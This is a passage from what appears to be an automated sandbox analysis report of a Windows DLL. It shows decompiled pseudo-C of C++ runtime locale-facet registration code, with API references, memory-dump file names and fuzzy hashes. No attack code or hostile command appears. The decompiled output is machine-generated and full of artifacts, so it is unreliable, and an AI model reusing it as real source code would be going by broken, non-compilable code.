																																					E6DDF00AC(0x6de383cf, _t637, _t850, _t871, 0x14);
																																					E6DDD6653(_t902 - 0x14, 0);
																																					_t872 =  *0x6de96dc4; // 0x0
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6DDB161C(0x6de96d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
																																						E6DDD66BA(_t902 - 0x14);
																																						return E6DDF0075(_t851);
																																					} else {
																																						__eflags = _t872;
																																						if(_t872 == 0) {
																																							_push( *((intOrPtr*)(_t902 + 8)));
																																							_push(_t902 - 0x10);
																																							__eflags = E6DDE12B4(_t637, _t717, _t838, _t851, _t872) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t902 - 0x20);
																																								E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t637, _t851, _t872, 0x14);
																																								E6DDD6653(_t902 - 0x14, 0);
																																								_t873 =  *0x6de96dd8; // 0x0
																																								 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																								 *(_t902 - 0x10) = _t873;
																																								_t449 = E6DDB161C(0x6de96d84);
																																								_t724 =  *((intOrPtr*)(_t902 + 8));
																																								_t852 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t449);
																																								__eflags = _t852;
																																								if(_t852 != 0) {
																																									L89:
																																									E6DDD66BA(_t902 - 0x14);
																																									return E6DDF0075(_t852);
																																								} else {
																																									__eflags = _t873;
																																									if(_t873 == 0) {
																																										_push( *((intOrPtr*)(_t902 + 8)));
																																										_push(_t902 - 0x10);
																																										__eflags = E6DDE1339(_t637, _t724, _t838, _t852, _t873) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t902 - 0x20);
																																											E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t637, _t852, _t873, 0x14);
																																											E6DDD6653(_t902 - 0x14, 0);
																																											_t874 =  *0x6de96db0; // 0x0
																																											 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																											 *(_t902 - 0x10) = _t874;
																																											_t462 = E6DDB161C(0x6de96d64);
																																											_t731 =  *((intOrPtr*)(_t902 + 8));
																																											_t853 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t462);
																																											__eflags = _t853;
																																											if(_t853 != 0) {
																																												L96:
																																												E6DDD66BA(_t902 - 0x14);
																																												return E6DDF0075(_t853);
																																											} else {
																																												__eflags = _t874;
																																												if(_t874 == 0) {
																																													_push( *((intOrPtr*)(_t902 + 8)));
																																													_push(_t902 - 0x10);
																																													__eflags = E6DDE13A1(_t637, _t731, _t838, _t853, _t874) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t902 - 0x20);
																																														E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t637, _t853, _t874, 0x14);
																																														E6DDD6653(_t902 - 0x14, 0);
																																														_t875 =  *0x6de96ddc; // 0x0
																																														 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																														 *(_t902 - 0x10) = _t875;
																																														_t475 = E6DDB161C(0x6de96d88);
																																														_t738 =  *((intOrPtr*)(_t902 + 8));
																																														_t854 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t475);
																																														__eflags = _t854;
																																														if(_t854 != 0) {
																																															L103:
																																															E6DDD66BA(_t902 - 0x14);
																																															return E6DDF0075(_t854);
																																														} else {
																																															__eflags = _t875;
																																															if(_t875 == 0) {
																																																_push( *((intOrPtr*)(_t902 + 8)));
																																																_push(_t902 - 0x10);
																																																__eflags = E6DDE1409(_t637, _t738, _t838, _t854, _t875) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t902 - 0x20);
																																																	E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t637, _t854, _t875, 0x14);
																																																	E6DDD6653(_t902 - 0x14, 0);
																																																	_t876 =  *0x6de96de0; // 0x0
																																																	 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																	 *(_t902 - 0x10) = _t876;
																																																	_t488 = E6DDB161C(0x6de96d8c);
																																																	_t745 =  *((intOrPtr*)(_t902 + 8));
																																																	_t855 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t488);
																																																	__eflags = _t855;
																																																	if(_t855 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t902 - 0x14);
																																																		return E6DDF0075(_t855);
																																																	} else {
																																																		__eflags = _t876;
																																																		if(_t876 == 0) {
																																																			_push( *((intOrPtr*)(_t902 + 8)));
																																																			_push(_t902 - 0x10);
																																																			__eflags = E6DDE1471(_t637, _t745, _t838, _t855, _t876) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t902 - 0x20);
																																																				E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t637, _t855, _t876, 0x14);
																																																				E6DDD6653(_t902 - 0x14, 0);
																																																				_t877 =  *0x6de96dfc; // 0x0
																																																				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																				 *(_t902 - 0x10) = _t877;
																																																				_t501 = E6DDB161C(0x6de96da8);
																																																				_t752 =  *((intOrPtr*)(_t902 + 8));
																																																				_t856 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t501);
																																																				__eflags = _t856;
																																																				if(_t856 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t902 - 0x14);
																																																					return E6DDF0075(_t856);
																																																				} else {
																																																					__eflags = _t877;
																																																					if(_t877 == 0) {
																																																						_push( *((intOrPtr*)(_t902 + 8)));
																																																						_push(_t902 - 0x10);
																																																						__eflags = E6DDE14EC(_t637, _t752, _t838, _t856, _t877) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t902 - 0x20);
																																																							E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t637, _t856, _t877, 0x14);
																																																							E6DDD6653(_t902 - 0x14, 0);
																																																							_t878 =  *0x6de96dcc; // 0x0
																																																							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																							 *(_t902 - 0x10) = _t878;
																																																							_t514 = E6DDB161C(0x6de96d80);
																																																							_t759 =  *((intOrPtr*)(_t902 + 8));
																																																							_t857 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t514);
																																																							__eflags = _t857;
																																																							if(_t857 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t902 - 0x14);
																																																								return E6DDF0075(_t857);
																																																							} else {
																																																								__eflags = _t878;
																																																								if(_t878 == 0) {
																																																									_push( *((intOrPtr*)(_t902 + 8)));
																																																									_push(_t902 - 0x10);
																																																									__eflags = E6DDE1558(_t637, _t759, _t838, _t857, _t878) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6DDB1438(_t902 - 0x20);
																																																										E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de383cf, _t637, _t857, _t878, 0x14);
																																																										E6DDD6653(_t902 - 0x14, 0);
																																																										_t879 =  *0x6de96e00; // 0x0
																																																										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																										 *(_t902 - 0x10) = _t879;
																																																										_t527 = E6DDB161C(0x6de96dac);
																																																										_t766 =  *((intOrPtr*)(_t902 + 8));
																																																										_t858 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t527);
																																																										__eflags = _t858;
																																																										if(_t858 != 0) {
																																																											L131:
																																																											E6DDD66BA(_t902 - 0x14);
																																																											return E6DDF0075(_t858);
																																																										} else {
																																																											__eflags = _t879;
																																																											if(_t879 == 0) {
																																																												_push( *((intOrPtr*)(_t902 + 8)));
																																																												_push(_t902 - 0x10);
																																																												__eflags = E6DDE15C4(_t637, _t766, _t838, _t858, _t879) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6DDB1438(_t902 - 0x20);
																																																													E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																													asm("int3");
																																																													E6DDF00AC(0x6de383cf, _t637, _t858, _t879, 0x14);
																																																													E6DDD6653(_t902 - 0x14, 0);
																																																													_t880 =  *0x6de96dd0; // 0x0
																																																													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																													 *(_t902 - 0x10) = _t880;
																																																													_t540 = E6DDB161C(0x6de96d60);
																																																													_t773 =  *((intOrPtr*)(_t902 + 8));
																																																													_t859 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t540);
																																																													__eflags = _t859;
																																																													if(_t859 != 0) {
																																																														L138:
																																																														E6DDD66BA(_t902 - 0x14);
																																																														return E6DDF0075(_t859);
																																																													} else {
																																																														__eflags = _t880;
																																																														if(_t880 == 0) {
																																																															_push( *((intOrPtr*)(_t902 + 8)));
																																																															_push(_t902 - 0x10);
																																																															__eflags = E6DDE162A(_t637, _t773, _t838, _t859, _t880) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																_t777 = _t902 - 0x20;
																																																																E6DDB1438(_t777);
																																																																E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																																asm("int3");
																																																																E6DDF00AC(0x6de3851f, _t637, _t859, _t880, 4);
																																																																_t881 = _t777;
																																																																 *(_t902 - 0x10) = _t881;
																																																																 *((intOrPtr*)(_t881 + 4)) =  *((intOrPtr*)(_t902 + 0xc));
																																																																_push( *((intOrPtr*)(_t902 + 0x14)));
																																																																_t287 = _t902 - 4;
																																																																 *_t287 =  *(_t902 - 4) & 0x00000000;
																																																																__eflags =  *_t287;
																																																																 *_t881 = 0x6de3c0c4;
																																																																 *((char*)(_t881 + 0x28)) =  *((intOrPtr*)(_t902 + 0x10));
																																																																E6DDE542F(_t637, _t777, _t838, _t859, _t881,  *_t287);
																																																																return E6DDF0075(_t881,  *((intOrPtr*)(_t902 + 8)));
																																																															} else {
																																																																_t859 =  *(_t902 - 0x10);
																																																																 *(_t902 - 0x10) = _t859;
																																																																 *(_t902 - 4) = 1;
																																																																E6DDD6FD3(__eflags, _t859);
																																																																 *0x6de3a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t859 + 4))))();
																																																																 *0x6de96dd0 = _t859;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t859 = _t880;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t858 =  *(_t902 - 0x10);
																																																													 *(_t902 - 0x10) = _t858;
																																																													 *(_t902 - 4) = 1;
																																																													E6DDD6FD3(__eflags, _t858);
																																																													 *0x6de3a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t858 + 4))))();
																																																													 *0x6de96e00 = _t858;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t858 = _t879;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t857 =  *(_t902 - 0x10);
																																																										 *(_t902 - 0x10) = _t857;
																																																										 *(_t902 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t857);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t857 + 4))))();
																																																										 *0x6de96dcc = _t857;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t857 = _t878;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t856 =  *(_t902 - 0x10);
																																																							 *(_t902 - 0x10) = _t856;
																																																							 *(_t902 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t856);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t856 + 4))))();
																																																							 *0x6de96dfc = _t856;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t856 = _t877;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t855 =  *(_t902 - 0x10);
																																																				 *(_t902 - 0x10) = _t855;
																																																				 *(_t902 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t855);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t855 + 4))))();
																																																				 *0x6de96de0 = _t855;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t855 = _t876;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t854 =  *(_t902 - 0x10);
																																																	 *(_t902 - 0x10) = _t854;
																																																	 *(_t902 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t854);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t854 + 4))))();
																																																	 *0x6de96ddc = _t854;
																																																	goto L103;
																																																}
																																															} else {
																																																_t854 = _t875;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t853 =  *(_t902 - 0x10);
																																														 *(_t902 - 0x10) = _t853;
																																														 *(_t902 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t853);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t853 + 4))))();
																																														 *0x6de96db0 = _t853;
																																														goto L96;
																																													}
																																												} else {
																																													_t853 = _t874;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t852 =  *(_t902 - 0x10);
																																											 *(_t902 - 0x10) = _t852;
																																											 *(_t902 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t852);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t852 + 4))))();
																																											 *0x6de96dd8 = _t852;
																																											goto L89;
																																										}
																																									} else {
																																										_t852 = _t873;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t851 =  *(_t902 - 0x10);
																																								 *(_t902 - 0x10) = _t851;
																																								 *(_t902 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t851);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t851 + 4))))();
																																								 *0x6de96dc4 = _t851;
																																								goto L82;
																																							}
																																						} else {
																																							_t851 = _t872;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t850 =  *(_t902 - 0x10);
																																					 *(_t902 - 0x10) = _t850;
																																					 *(_t902 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t850);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t850 + 4))))();
																																					 *0x6de96dc8 = _t850;
																																					goto L75;
																																				}
																																			} else {
																																				_t850 = _t871;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t849 =  *(_t902 - 0x10);
																																		 *(_t902 - 0x10) = _t849;
																																		 *(_t902 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t849);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t849 + 4))))();
																																		 *0x6de96df4 = _t849;
																																		goto L68;
																																	}
																																} else {
																																	_t849 = _t870;
																																	goto L68;
																																}
																															}
																														} else {
																															_t848 =  *(_t902 - 0x10);
																															 *(_t902 - 0x10) = _t848;
																															 *(_t902 - 4) = 1;
																															E6DDD6FD3(__eflags, _t848);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t848 + 4))))();
																															 *0x6de96df8 = _t848;
																															goto L61;
																														}
																													} else {
																														_t848 = _t869;
																														goto L61;
																													}
																												}
																											} else {
																												_t847 =  *(_t902 - 0x10);
																												 *(_t902 - 0x10) = _t847;
																												 *(_t902 - 4) = 1;
																												E6DDD6FD3(__eflags, _t847);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t847 + 4))))();
																												 *0x6de96dc0 = _t847;
																												goto L54;
																											}
																										} else {
																											_t847 = _t868;
																											goto L54;
																										}
																									}
																								} else {
																									_t846 =  *(_t902 - 0x10);
																									 *(_t902 - 0x10) = _t846;
																									 *(_t902 - 4) = 1;
																									E6DDD6FD3(__eflags, _t846);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t846 + 4))))();
																									 *0x6de96df0 = _t846;
																									goto L47;
																								}
																							} else {
																								_t846 = _t867;
																								goto L47;
																							}
																						}
																					} else {
																						_t845 =  *(_t902 - 0x10);
																						 *(_t902 - 0x10) = _t845;
																						 *(_t902 - 4) = 1;
																						E6DDD6FD3(__eflags, _t845);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t845 + 4))))();
																						 *0x6de96dbc = _t845;
																						goto L40;
																					}
																				} else {
																					_t845 = _t866;
																					goto L40;
																				}
																			}
																		} else {
																			_t844 =  *(_t902 - 0x10);
																			 *(_t902 - 0x10) = _t844;
																			 *(_t902 - 4) = 1;
																			E6DDD6FD3(__eflags, _t844);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t844 + 4))))();
																			 *0x6de96dec = _t844;
																			goto L33;
																		}
																	} else {
																		_t844 = _t865;
																		goto L33;
																	}
																}
															} else {
																_t843 =  *(_t902 - 0x10);
																 *(_t902 - 0x10) = _t843;
																 *(_t902 - 4) = 1;
																E6DDD6FD3(__eflags, _t843);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t843 + 4))))();
																 *0x6de96db8 = _t843;
																goto L26;
															}
														} else {
															_t843 = _t864;
															goto L26;
														}
													}
												} else {
													_t842 =  *(_t902 - 0x10);
													 *(_t902 - 0x10) = _t842;
													 *(_t902 - 4) = 1;
													E6DDD6FD3(__eflags, _t842);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t842 + 4))))();
													 *0x6de96de8 = _t842;
													goto L19;
												}
											} else {
												_t842 = _t863;
												goto L19;
											}
										}
									} else {
										_t841 =  *(_t902 - 0x10);
										 *(_t902 - 0x10) = _t841;
										 *(_t902 - 4) = 1;
										E6DDD6FD3(__eflags, _t841);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t841 + 4))))();
										 *0x6de96dd4 = _t841;
										goto L12;
									}
								} else {
									_t841 = _t862;
									goto L12;
								}
							}
						} else {
							_t840 =  *(_t902 - 0x10);
							 *(_t902 - 0x10) = _t840;
							 *(_t902 - 4) = 1;
							E6DDD6FD3(__eflags, _t840);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t840 + 4))))();
							 *0x6de96db4 = _t840;
							goto L5;
						}
					} else {
						_t840 = _t861;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF03E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF048
int.LIBCPMT ref: 6DDDF05F

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

collate.LIBCPMT ref: 6DDDF082
std::_Facet_Register.LIBCPMT ref: 6DDDF099
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF0D7

Strings

hmm, xrefs: 6DDDF053

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hmm
API String ID: 2363045490-380746299
Opcode ID: 7709b4a82ed02b32d5c635068809638904ba47d4f129c0ecceb445fcfe12454b
Instruction ID: 116d0f0a26a9bc06059bf3de1f7f852bc0d449ff607af5d545ac86e01f110632
Opcode Fuzzy Hash: 7709b4a82ed02b32d5c635068809638904ba47d4f129c0ecceb445fcfe12454b
Instruction Fuzzy Hash: 8411C276849519DBCF01FB64C840BFDB7B5AF94318F260009F511AB294DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t770 - 0x14, 0);
				_t735 =  *0x6de96db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6DDB161C(0x6de96d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6DDD66BA(_t770 - 0x14);
					return E6DDF0075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6DDE0F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t770 - 0x20);
							E6DDF3D74(_t770 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t717, _t735, 0x14);
							E6DDD6653(_t770 - 0x14, 0);
							_t736 =  *0x6de96dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6DDB161C(0x6de96d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6DDD66BA(_t770 - 0x14);
								return E6DDF0075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6DDE0F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t770 - 0x20);
										E6DDF3D74(_t770 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t544, _t718, _t736, 0x14);
										E6DDD6653(_t770 - 0x14, 0);
										_t737 =  *0x6de96dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6DDB161C(0x6de96d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6DDD66BA(_t770 - 0x14);
											return E6DDF0075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6DDE0FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t770 - 0x20);
													E6DDF3D74(_t770 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t544, _t719, _t737, 0x14);
													E6DDD6653(_t770 - 0x14, 0);
													_t738 =  *0x6de96df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6DDB161C(0x6de96d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6DDD66BA(_t770 - 0x14);
														return E6DDF0075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6DDE1057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t770 - 0x20);
																E6DDF3D74(_t770 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t544, _t720, _t738, 0x14);
																E6DDD6653(_t770 - 0x14, 0);
																_t739 =  *0x6de96dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6DDB161C(0x6de96d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6DDD66BA(_t770 - 0x14);
																	return E6DDF0075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6DDE10BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t770 - 0x20);
																			E6DDF3D74(_t770 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t544, _t721, _t739, 0x14);
																			E6DDD6653(_t770 - 0x14, 0);
																			_t740 =  *0x6de96df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6DDB161C(0x6de96da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6DDD66BA(_t770 - 0x14);
																				return E6DDF0075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6DDE1127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t770 - 0x20);
																						E6DDF3D74(_t770 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t544, _t722, _t740, 0x14);
																						E6DDD6653(_t770 - 0x14, 0);
																						_t741 =  *0x6de96df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6DDB161C(0x6de96da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6DDD66BA(_t770 - 0x14);
																							return E6DDF0075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6DDE11AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t770 - 0x20);
																									E6DDF3D74(_t770 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t544, _t723, _t741, 0x14);
																									E6DDD6653(_t770 - 0x14, 0);
																									_t742 =  *0x6de96dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6DDB161C(0x6de96d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6DDD66BA(_t770 - 0x14);
																										return E6DDF0075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6DDE1230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t770 - 0x20);
																												E6DDF3D74(_t770 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t544, _t724, _t742, 0x14);
																												E6DDD6653(_t770 - 0x14, 0);
																												_t743 =  *0x6de96dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6DDB161C(0x6de96d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6DDD66BA(_t770 - 0x14);
